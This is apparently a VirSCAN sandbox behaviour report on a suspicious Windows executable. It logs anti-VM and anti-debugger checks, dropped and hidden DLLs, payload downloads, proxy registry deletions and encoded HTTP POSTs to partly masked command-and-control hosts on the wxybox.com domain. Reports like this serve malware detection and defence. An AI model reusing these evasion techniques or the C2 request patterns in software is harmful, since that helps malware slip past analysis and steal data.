VirSCAN


File information
Security rating:50
Behavior list
Basic information
MD5:492936e12373be4b7957465e52fe2c5b
File type:EXE
Vendor:QQ:285774054
Version:4.6.5.0---4.6.5.0
Packer or compiler information:COMPILER:Elan
Key behavior
Behavior description:Checks whether Virtual PC is present
Details:N/A
Behavior description:Attempts to open the driver device object of a debugger or monitoring tool
Details:\??\NTICE
Behavior description:Gets the TickCount value
Details:TickCount = 227643, SleepMilliseconds = 300.
TickCount = 231890, SleepMilliseconds = 2000.
TickCount = 231906, SleepMilliseconds = 2000.
TickCount = 231937, SleepMilliseconds = 2000.
TickCount = 231953, SleepMilliseconds = 2000.
TickCount = 240093, SleepMilliseconds = 10000.
TickCount = 234187, SleepMilliseconds = 4000.
TickCount = 232203, SleepMilliseconds = 2000.
TickCount = 232250, SleepMilliseconds = 2000.
TickCount = 232265, SleepMilliseconds = 2000.
TickCount = 232281, SleepMilliseconds = 2000.
TickCount = 232296, SleepMilliseconds = 2000.
TickCount = 240312, SleepMilliseconds = 10000.
TickCount = 232484, SleepMilliseconds = 2000.
TickCount = 234500, SleepMilliseconds = 4000.
Behavior description:Sets special file attributes
Details:C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll
Behavior description:Sets special folder attributes
Details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description:Reads the CPU clock directly
Details:EAX = 0xdf800350, EDX = 0x000000bb
EAX = 0xdf80039c, EDX = 0x000000bb
EAX = 0xdf8003e8, EDX = 0x000000bb
EAX = 0xdf800434, EDX = 0x000000bb
EAX = 0xdf800480, EDX = 0x000000bb
EAX = 0xdf8004cc, EDX = 0x000000bb
EAX = 0xdf800518, EDX = 0x000000bb
EAX = 0xdf800564, EDX = 0x000000bb
EAX = 0xdf8005b0, EDX = 0x000000bb
EAX = 0xdf8005fc, EDX = 0x000000bb
Behavior description:Searches for windows of common anti-virus and analysis tools
Details:NtUserFindWindowEx: [Class,Window] = [Regmonclass,]
NtUserFindWindowEx: [Class,Window] = [Filemonclass,]
Behavior description:Detects a virtual machine via the VMware special instruction
Details:N/A
Process behavior
Behavior description:Creates local threads
Details:TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2968, StartAddress = 00E555A5, Parameter = 001D5E58
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2972, StartAddress = 00E555A5, Parameter = 001D5E58
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2976, StartAddress = 00E555A5, Parameter = 001D5E58
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2980, StartAddress = 00E555A5, Parameter = 001D5E58
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2984, StartAddress = 00E555A5, Parameter = 001D5D78
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2988, StartAddress = 00E555A5, Parameter = 001D5F08
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2992, StartAddress = 00E555A5, Parameter = 001D5F08
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 2996, StartAddress = 00E555A5, Parameter = 001D5F08
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3160, StartAddress = 00E555A5, Parameter = 001D5F08
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3164, StartAddress = 00E555A5, Parameter = 001D5E58
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3168, StartAddress = 00E555A5, Parameter = 001D5E58
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3272, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3304, StartAddress = 7C947EBB, Parameter = 00000000
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3308, StartAddress = 7C930230, Parameter = 00000000
TargetProcess: 万能公式.dll, InheritedFromPID = 2704, ProcessID = 2908, ThreadID = 3312, StartAddress = 77E56C7D, Parameter = 0022E018
Behavior description:Creates a process from a newly created file
Details:[0x00000b5c]ImagePath = C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll, CmdLine = "C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll"
Behavior description:Enumerates processes
Details:N/A
File behavior
Behavior description:Creates files
Details:C:\kkwn.ini
C:\WINDOWS\Sockee.dll
C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.1
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.2
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.3
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.4
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.5
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.6
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.7
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.8
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.9
C:\Documents and Settings\Administrator\Local Settings\Temp\~xduan.10
C:\Documents and Settings\Administrator\Local Settings\Temp\~mubiao.10
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\l2gs[1]
Behavior description:Creates executable files
Details:C:\WINDOWS\Sockee.dll
C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.4
C:\Documents and Settings\Administrator\Local Settings\%temp%\SoftXLic.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.10
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.11
Behavior description:Deletes files
Details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\l2gs[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\navcancl[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\ErrorPageTemplate[2]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\errorPageStrings[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\httpErrorPagesScripts[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\background_gradient[3]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\info_48[2]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\bullet[2]
C:\Documents and Settings\Administrator\Local Settings\%temp%\SoftXLic.dll
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\~temp[1].j
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\~temp[1].f
Behavior description:Overwrites existing files
Details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\navcancl[2]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\ErrorPageTemplate[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\errorPageStrings[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\httpErrorPagesScripts[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\background_gradient[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\info_48[1]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6TLOMATB\bullet[1]
Behavior description:Searches for files
Details:FileName = C:\kkwn.ini
FileName = C:\Documents and Settings\Administrator\Local Settings\Temp
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll
FileName = c:\*.log
FileName = C:\Documents and Settings
FileName = C:\Documents and Settings\Administrator
FileName = C:\Documents and Settings\Administrator\Local Settings
FileName = C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
FileName = C:\WINDOWS\system32\Ras\*.pbk
FileName = C:\Documents and Settings\Administrator\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\system32\urlmon.dll
FileName = C:\WINDOWS\system32\ieframe.dll
Behavior description:Sets special file attributes
Details:C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll
Behavior description:Sets special folder attributes
Details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description:Modifies file contents
Details:C:\kkwn.ini ---> Offset = 0
C:\kkwn.ini ---> Offset = 43
C:\kkwn.ini ---> Offset = 53
C:\WINDOWS\Sockee.dll ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.1 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.2 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.3 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.4 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.5 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.6 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.7 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.8 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.9 ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\~xduan.10 ---> Offset = 0
Network behavior
Behavior description:Downloads files
Details:C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.10
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.11
Behavior description:Connects to a specified site
Details:InternetConnectA: ServerName = gs****om, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
InternetConnectA: ServerName = 25****om, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0010, Flags = 0x00000000
WinHttpConnect: ServerName = kk****om, PORT = 80, UserName = , Password = , hSession = 0x06814000, hConnect = 0x06814100, Flags = 0x00000000
WinHttpConnect: ServerName = kk****om, PORT = 80, UserName = , Password = , hSession = 0x06814000, hConnect = 0x06814200, Flags = 0x00000000
InternetConnectA: ServerName = gs****om, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0010, Flags = 0x00000000
Behavior description:Opens an HTTP connection
Details:InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489), hSession = 0x00cc0004
WinHttpOpen: UserAgent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 468559416), hSession = 0x06814000
WinHttpOpen: UserAgent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 575329519), hSession = 0x06814000
WinHttpOpen: UserAgent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 658160780), hSession = 0x06814000
WinHttpOpen: UserAgent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 676527751), hSession = 0x06814000
Behavior description:Establishes a socket connection to a specified host
Details:URL: gs****om, IP: **.133.40.**:80, SOCKET = 0x00000398
URL: gs****om, IP: **.133.40.**:80, SOCKET = 0x00000434
URL: 25****om, IP: **.133.40.**:80, SOCKET = 0x000004f0
URL: 25****om, IP: **.133.40.**:80, SOCKET = 0x000004f4
URL: kk****om, IP: **.133.40.**:80, SOCKET = 0x00000548
URL: gs****om, IP: **.133.40.**:80, SOCKET = 0x0000048c
URL: kk****om, IP: **.133.40.**:80, SOCKET = 0x00000598
Behavior description:Reads a file from the network
Details:hFile = 0x00cc000c, BytesToRead =4096, BytesRead = 4096.
hFile = 0x00cc0014, BytesToRead =4096, BytesRead = 4096.
Behavior description:Sends HTTP packets
Details:GET /l2gs/ HTTP/1.1 Accept: */* Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: gs****om Connection: Keep-Alive
GET /~temp.j HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: 25****om Connection: Keep-Alive
GET /~temp.f HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: 25****om Connection: Keep-Alive
POST /kss_io/io.php?v=10&b=1&s=10000010&e=get&kstoken=69518496564 HTTP/1.1 Cookie: kstoken=69518496564 Accept: */* Accept-Language: zh-cn Cache-Control: no-cache Referer: http://kk.wxybox.com/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 468559416) Host: kk****om Content-Length: 106 Connection: Keep-Alive o=_Data6F4qkA2d2KRntp4PlxthYBLPICDmYQ7Q3VuAhK4Tkjt6t556napXCckCN_2DphU2iz8qpiZ4SRbzCR71HgvHVgP3cyntjTmsdZx
POST /kss_io/io.php?v=10&b=1&s=10000010&e=get&kstoken=79215599375 HTTP/1.1 Cookie: kstoken=79215599375 Accept: */* Accept-Language: zh-cn Cache-Control: no-cache Referer: http://kk.wxybox.com/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 575329519) Host: kk****om Content-Length: 106 Connection: Keep-Alive o=_Data6F4qkA2d2KRntp4PlxthYBLPICDmYQ7Q3VuAhK4Tkjt6t556napXCckCN_2DphU2iz8qpiZ4SRbzCR71HgvHVgP3cyntjTmsdZx
GET /l2gs/ HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/msword, */* Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: gs****om Connection: Keep-Alive
POST /kss_io/io.php?v=10&b=1&s=10000010&kstoken=50688600157 HTTP/1.1 Cookie: kstoken=50688600157 Accept: */* Accept-Language: zh-cn Cache-Control: no-cache Referer: http://kk.wxybox.com/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 658160780) Host: kk****om Content-Length: 570 Connection: Keep-Alive o=_Data442H9|||RTrhO3uHxoJRvd1H3f4cIRzg0f8jcLgiuDZ|cfMk6nJSTHG38MtN2AShzjbrqvezPRur0_50GRDNZDvz3LY|wNuj6fzyvS8yZDy46Zmf5UvDU7ah2Dhz1KpH6McV6ZWP0ZXi97bkkHij8|235qN66K4jzfXc5R5yUWPiGdn3gfXpdoG4vK1wuT5q6kgiOjf3coiPxUUp9TTPqHWF7o|hvMV7z8GC3Wl02d2fPdYjRqTSyrqP2fQ0JSPuInFPPHi7Rj6r1k9FwZgPvTZyOjd3TIuHkI2DP3M|SHnpRyRs2oh0Jv7R3dbzGkoNO83P3nnR1bS3qpW39_3|kMQqSRoP3TBNuTKF63BuqIARz8_gqMu0yZI0Rrj73RsN7jBWfDwCcTmfSqtVzpf0xITcvR6|3_zQIDVqdkayPTJQGbggRMHDyHkcI|qyzpiDuEkSxWBrx3RWd7239M_N037QwHp7wEjq7IWCcU8zSTFkGRj|6dr6fUarzE9wuUX|TdR467GNTfhRIN8cunHrcvTfMp8W1ACN0fwHUReF5Ej|3DXVSvE
POST /kss_io/io.php?v=10&b=1&s=10000010&kstoken=77256671577 HTTP/1.1 Cookie: kstoken=77256671577 Accept: */* Accept-Language: zh-cn Cache-Control: no-cache Referer: http://kk.wxybox.com/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 676527751) Host: kk****om Content-Length: 570 Connection: Keep-Alive o=_Data442H9|||RTrhO3uHxoJRvd1H3f4cIRzg0f8jcLgiuDZ|cfMk6nJSTHG38MtN2AShzjbrqvezPRur0_50GRDNZDvz3LY|wNuj6fzyvS8yZDy46Zmf5UvDU7ah2Dhz1KpH6McV6ZWP0ZXi97bkkHij8|235qN66K4jzfXc5R5yUWPiGdn3gfXpdoG4vK1wuT5q6kgiOjf3coiPxUUp9TTPqHWF7o|hvMV7z8GC3Wl02d2fPdYjRqTSyrqP2fQ0JSPuInFPPHi7Rj6r1k9FwZgPvTZyOjd3TIuHkI2DP3M|SHnpRyRs2oh0Jv7R3dbzGkoNO83P3nnR1bS3qpW39_3|kMQqSRoP3TBNuTKF63BuqIARz8_gqMu0yZI0Rrj73RsN7jBWfDwCcTmfSqtVzpf0xITcvR6|3_zQIDVqdkayPTJQGbggRMHDyHkcI|qyzpiDuEkSxWBrx3RWd7239M_N037QwHp7wEjq7IWCcU8zSTFkGRj|6dr6fUarzE9wuUX|TdR467GNTfhRIN8cunHrcvTfMp8W1ACN0fwHUReF5Ej|3DXVSvE
Behavior description:Opens an HTTP request
Details:HttpOpenRequestA: gs****om:80/l2gs/, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400000
HttpOpenRequestA: gs****om:80/l2gs/, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: 25****om:80/~temp.j, hConnect = 0x00cc0010, hRequest = 0x00cc0014, Verb: GET, Referer: , Flags = 0x00400000
HttpOpenRequestA: 25****om:80/~temp.f, hConnect = 0x00cc0010, hRequest = 0x00cc0014, Verb: GET, Referer: , Flags = 0x00400000
WinHttpOpenRequest: kk****om:80/kss_io/io.php?v=10&b=1&s=10000010&e=get&kstoken=69518496564, hConnect = 0x06814100, hRequest = 0x06d40000, Verb: POST, Referer: , Flags = 0x00000000
WinHttpOpenRequest: kk****om:80/kss_io/io.php?v=10&b=1&s=10000010&e=get&kstoken=79215599375, hConnect = 0x06814200, hRequest = 0x06d40000, Verb: POST, Referer: , Flags = 0x00000000
HttpOpenRequestA: gs****om:80/l2gs/, hConnect = 0x00cc0010, hRequest = 0x00cc0014, Verb: GET, Referer: , Flags = 0x00400000
WinHttpOpenRequest: kk****om:80/kss_io/io.php?v=10&b=1&s=10000010&kstoken=50688600157, hConnect = 0x06814100, hRequest = 0x06d40000, Verb: POST, Referer: , Flags = 0x00000000
WinHttpOpenRequest: kk****om:80/kss_io/io.php?v=10&b=1&s=10000010&kstoken=77256671577, hConnect = 0x06814200, hRequest = 0x06d40000, Verb: POST, Referer: , Flags = 0x00000000
Behavior description:Resolves a host address by name
Details:GetAddrInfoW: gs****om
GetAddrInfoW: 25****om
GetAddrInfoW: kk****om
Registry behavior
Behavior description:Modifies the registry
Details:\REGISTRY\USER\S-*_CLASSES\Interface\{BBD5FF19-BC8F-B199-B2CD-BF57A85DB906}\
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Behavior description:Deletes registry values
Details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Other behavior
Behavior description:Checks whether Virtual PC is present
Details:N/A
Behavior description:Creates mutexes
Details:CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
RasPbFile
CritOpMutex
Local\!PrivacIE!SharedMemory!Mutex
MSIMGSIZECacheMutex
MSCTF.Shared.MUTEX.IOH
Behavior description:Creates event objects
Details:EventName = DINPUTWINMM
EventName = Global\userenv: User Profile setup event
EventName = MSCTF.SendReceive.Event.IPM.IC
EventName = MSCTF.SendReceiveConection.Event.IPM.IC
EventName = MSCTF.SendReceive.Event.AGL.IC
EventName = MSCTF.SendReceiveConection.Event.AGL.IC
Behavior description:Checks whether it is being debugged
Details:IsDebuggerPresent
Behavior description:Window information
Details:Pid = 2908, Hwnd=0x104dc, Text = 您想运行或保存此文件吗?, ClassName = Static.
Pid = 2908, Hwnd=0x104e0, Text = 名称:, ClassName = Static.
Pid = 2908, Hwnd=0x104e2, Text = update.exe, ClassName = SysLink.
Pid = 2908, Hwnd=0x104e4, Text = 发行者:, ClassName = Static.
Pid = 2908, Hwnd=0x104e8, Text = 类型:, ClassName = Static.
Pid = 2908, Hwnd=0x104ea, Text = 应用程序, 358KB, ClassName = Static.
Pid = 2908, Hwnd=0x104ec, Text = 从:, ClassName = Static.
Pid = 2908, Hwnd=0x104ee, Text = gs.wxybox.com, ClassName = Static.
Pid = 2908, Hwnd=0x104f0, Text = 运行(&R), ClassName = Button.
Pid = 2908, Hwnd=0x104f2, Text = 保存(&S), ClassName = Button.
Pid = 2908, Hwnd=0x104f4, Text = 取消, ClassName = Button.
Pid = 2908, Hwnd=0x104f6, Text = 打开此类文件前总是询问(&W), ClassName = Button(CheckBox).
Pid = 2908, Hwnd=0x104fc, Text = 来自 Internet 的文件可能对您有所帮助,但此文件类型可能危害您的计算机。如果您不信任其来源,请不要运行或保存该软件。<A>有何风险?</A>, ClassName = SysLink.
Pid = 2908, Hwnd=0x204d8, Text = 文件下载 - 安全警告, ClassName = #32770.
Pid = 2908, Hwnd=0x104a4, Text = 下载完毕, ClassName = Static.
Behavior description:Opens mutexes
Details:ShimCacheMutex
Local\!IETld!Mutex
Local\WininetStartupMutex
Local\_!MSFTHISTORY!_
Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Local\c:!documents and settings!administrator!cookies!
Local\c:!documents and settings!administrator!local settings!history!history.ie5!
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
RasPbFile
CtfmonInstMutexDefaultS-*
Behavior description:Searches for specified windows
Details:NtUserFindWindowEx: [Class,Window] = [4823-00000029,]
NtUserFindWindowEx: [Class,Window] = [18467-41,]
NtUserFindWindowEx: [Class,Window] = [MS_AutodialMonitor,]
NtUserFindWindowEx: [Class,Window] = [MS_WebCheckMonitor,]
NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,]
Behavior description:Attempts to open the driver device object of a debugger or monitoring tool
Details:\??\NTICE
Behavior description:Gets the TickCount value
Details:TickCount = 227643, SleepMilliseconds = 300.
TickCount = 231890, SleepMilliseconds = 2000.
TickCount = 231906, SleepMilliseconds = 2000.
TickCount = 231937, SleepMilliseconds = 2000.
TickCount = 231953, SleepMilliseconds = 2000.
TickCount = 240093, SleepMilliseconds = 10000.
TickCount = 234187, SleepMilliseconds = 4000.
TickCount = 232203, SleepMilliseconds = 2000.
TickCount = 232250, SleepMilliseconds = 2000.
TickCount = 232265, SleepMilliseconds = 2000.
TickCount = 232281, SleepMilliseconds = 2000.
TickCount = 232296, SleepMilliseconds = 2000.
TickCount = 240312, SleepMilliseconds = 10000.
TickCount = 232484, SleepMilliseconds = 2000.
TickCount = 234500, SleepMilliseconds = 4000.
Behavior description:Adjusts process token privileges
Details:SE_LOAD_DRIVER_PRIVILEGE
Behavior description:Opens events
Details:HookSwitchHookEnabledEvent
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
Global\Protected.61_-2909
Global\Protected.60_-2909
Global\SvcctrlStartEvent_A3752DX
\INSTALLATION_SECURITY_HOLD
MSFT.VSA.COM.DISABLE.2908
MSFT.VSA.IEC.STATUS.6c736db0
_fCanRegisterWithShellService
CTF.ThreadMIConnectionEvent.000007E8.00000000.0000000F
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.0000000F
MSCTF.SendReceiveConection.Event.IOH.IC
MSCTF.SendReceive.Event.IOH.IC
CTF.ThreadMIConnectionEvent.000007E8.00000000.00000010
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.00000010
Behavior description:Loads newly dropped files
Details:Image: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~temp.4.
Image: C:\Documents and Settings\Administrator\Local Settings\%temp%\SoftXLic.dll.
Behavior description:Executable file signature information
Details:C:\WINDOWS\Sockee.dll(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.4(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\%temp%\SoftXLic.dll(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.10(签名验证: 未通过)
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.11(签名验证: 未通过)
Behavior description:Calls the Sleep function
Details:[1]: MilliSeconds = 300.
[2]: MilliSeconds = 300.
[1]: MilliSeconds = 2000.
[2]: MilliSeconds = 2000.
[3]: MilliSeconds = 2000.
[4]: MilliSeconds = 2000.
[5]: MilliSeconds = 2000.
[6]: MilliSeconds = 10000.
[7]: MilliSeconds = 4000.
[8]: MilliSeconds = 2000.
[9]: MilliSeconds = 2000.
[10]: MilliSeconds = 2000.
Behavior description:Hides specified windows
Details:[Window,Class] = [,Button]
[Window,Class] = [,SysLink]
[Window,Class] = [,Static]
[Window,Class] = [文件大小未知,Static]
[Window,Class] = [打开此类文件前总是询问(&W),Button]
[Window,Class] = [发行者:,Static]
Behavior description:Gets the cursor position
Details:CursorPos = (80,18468), SleepMilliseconds = 10000.
CursorPos = (6373,26501), SleepMilliseconds = 2000.
CursorPos = (19208,15725), SleepMilliseconds = 5000.
CursorPos = (11517,29359), SleepMilliseconds = 2000.
CursorPos = (27001,24465), SleepMilliseconds = 2000.
CursorPos = (5744,28146), SleepMilliseconds = 10000.
CursorPos = (23320,16828), SleepMilliseconds = 10000.
CursorPos = (10000,492), SleepMilliseconds = 10000.
CursorPos = (3034,11943), SleepMilliseconds = 10000.
CursorPos = (4866,5437), SleepMilliseconds = 10000.
CursorPos = (32430,14605), SleepMilliseconds = 10000.
CursorPos = (3941,154), SleepMilliseconds = 2000.
CursorPos = (331,12383), SleepMilliseconds = 2000.
CursorPos = (17460,18717), SleepMilliseconds = 4000.
CursorPos = (19757,19896), SleepMilliseconds = 4000.
Behavior description:Executable file MD5
Details:C:\WINDOWS\Sockee.dll ---> 830e42a11083d10c5968ebdc764e1620
C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll ---> 文件过大!
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.4 ---> c578b6820bda5689940560147c6e5ffc
C:\Documents and Settings\Administrator\Local Settings\%temp%\SoftXLic.dll ---> 241b5d6679069042b5456e691a3a8e32
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.10 ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.11 ---> fe1d0ee5901dd167ee9b28eece31786c
Behavior description:Reads the CPU clock directly
Details:EAX = 0xdf800350, EDX = 0x000000bb
EAX = 0xdf80039c, EDX = 0x000000bb
EAX = 0xdf8003e8, EDX = 0x000000bb
EAX = 0xdf800434, EDX = 0x000000bb
EAX = 0xdf800480, EDX = 0x000000bb
EAX = 0xdf8004cc, EDX = 0x000000bb
EAX = 0xdf800518, EDX = 0x000000bb
EAX = 0xdf800564, EDX = 0x000000bb
EAX = 0xdf8005b0, EDX = 0x000000bb
EAX = 0xdf8005fc, EDX = 0x000000bb
Behavior description:Searches for windows of common anti-virus and analysis tools
Details:NtUserFindWindowEx: [Class,Window] = [Regmonclass,]
NtUserFindWindowEx: [Class,Window] = [Filemonclass,]
Behavior description:Detects a virtual machine via the VMware special instruction
Details:N/A